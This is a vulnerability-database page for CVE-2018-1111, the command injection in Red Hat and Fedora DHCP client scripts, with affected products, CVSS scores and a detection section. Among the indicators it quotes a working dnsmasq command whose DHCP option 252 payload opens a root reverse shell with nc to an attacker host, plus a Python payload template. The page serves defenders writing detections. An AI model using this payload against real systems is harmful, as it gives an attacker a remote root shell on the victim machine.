cbcvebase.
CVE-2018-1111
published 2018-05-17

CVE-2018-1111: DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script…

PriorityP277high7.5CVSS 3.0
AVAACHPRNUINSUCHIHAH
ITWEXPLOIT
Exploited in the wild
EPSS
94.46%
99.8th percentile
DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script included in the DHCP client. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.

Affected

26 ranges· showing 25
VendorProductVersion rangeFixed in
fedoradhcp
fedoraprojectfedora
fedoraprojectfedora
fedoraprojectfedora
paloaltopan-os
red_hatdhcp
red_hatdhcp
redhatenterprise_linux
redhatenterprise_linux
redhatenterprise_linux
redhatenterprise_linux
redhatenterprise_linux
redhatenterprise_linux
redhatenterprise_linux
redhatenterprise_linux
redhatenterprise_linux
redhatenterprise_linux
redhatenterprise_linux_desktop
redhatenterprise_linux_desktop
redhatenterprise_linux_server
redhatenterprise_linux_server
redhatenterprise_linux_workstation
redhatenterprise_linux_workstation
redhatenterprise_virtualization
redhatenterprise_virtualization

Detection & IOCsextracted from sources · hover to see the quote

commanddnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"
path/etc/NetworkManager/dispatcher.d/11-dhclient
path/var/lib/NetworkManager/dhclient-eth0.conf
command(252, "x'&{payload} #".format(payload=self.payload))
  • Alert on execution of /etc/NetworkManager/dispatcher.d/11-dhclient spawning unexpected child processes (e.g., nc, bash, touch) with root privileges, as this is the script exploited by the vulnerability.
  • Detect the DHCP4_WPAD environment variable being set to a value containing shell metacharacters (', &, |, ;) before the 11-dhclient script is executed.
  • Palo Alto Networks customers can use IPS signature 40739 to detect/block exploitation attempts against this vulnerability.
  • Look for the pattern x'&<command> # in DHCP option 252 payloads on the wire; this is the canonical injection format used in both the PoC and Metasploit module.
  • It is important to note that other characters may be used to perform this attack, such as | or ;, in addition to the & character demonstrated in the primary PoC.
  • ·The vulnerability only affects systems where NetworkManager is running AND DHCP is configured as the network configuration method. Systems not using NetworkManager with DHCP are not impacted.
  • ·Red Hat Enterprise Virtualization 4.1 ships vulnerable components but is not impacted in its default configuration because NetworkManager is turned off in the Management Appliance and not used with DHCP in the Hypervisor.
  • ·RHEL 5 and RHEL 8 dhcp packages are NOT affected; only RHEL 6 and 7 (and derivatives such as CentOS 6/7, Fedora 26/27/28) are vulnerable.

CVSS provenance

nvdv3.07.5HIGHCVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.9HIGHAV:A/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.